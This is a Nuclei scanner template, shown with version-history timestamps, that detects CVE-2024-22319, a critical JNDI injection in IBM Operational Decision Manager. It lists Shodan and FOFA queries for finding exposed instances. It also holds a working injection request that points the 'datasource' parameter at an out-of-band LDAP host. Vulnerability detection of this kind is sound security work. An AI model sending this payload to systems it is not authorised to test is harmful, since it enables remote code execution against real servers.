2024-02-22 11:26:22 +00:00
id : CVE-2024-22319
info :
2024-02-22 11:27:39 +00:00
name : IBM Operational Decision Manager - JNDI Injection
2024-02-22 11:26:22 +00:00
author : DhiyaneshDK
severity : critical
description : |
2024-02-22 11:42:17 +00:00
IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID : 279145 .
2024-02-22 11:26:22 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2024-22319
cwe-id : CWE-74
2024-05-31 19:23:20 +00:00
epss-score : 0.29329
epss-percentile : 0.96896
2024-02-22 11:26:22 +00:00
cpe : cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*
metadata :
verified : true
max-request : 1
vendor : ibm
product : operational_decision_manager
shodan-query : html:"IBM ODM"
fofa-query : title="IBM ODM"
tags : cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce
http :
2024-02-22 11:42:17 +00:00
- method : GET
path :
- "{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"
2024-02-22 11:26:22 +00:00
matchers :
2024-02-22 11:42:17 +00:00
- type : dsl
dsl :
- contains(interactsh_protocol, "dns")
- 'contains(header, "application/json")'
- 'contains(body, "patchLevel\":")'
- 'status_code == 200'
condition : and
2024-06-01 06:53:00 +00:00
# digest: 490a0046304402206863aa5b7da352d26b89fcd6e35a46e44dfa7f91bb2ca228c4a923e133eabd3d022073888ea7ac5cf67513056508ed63ce310cb36d3c9501172574f0ce4dd389e9dd:922c64590222798bb761d5b6d8e72950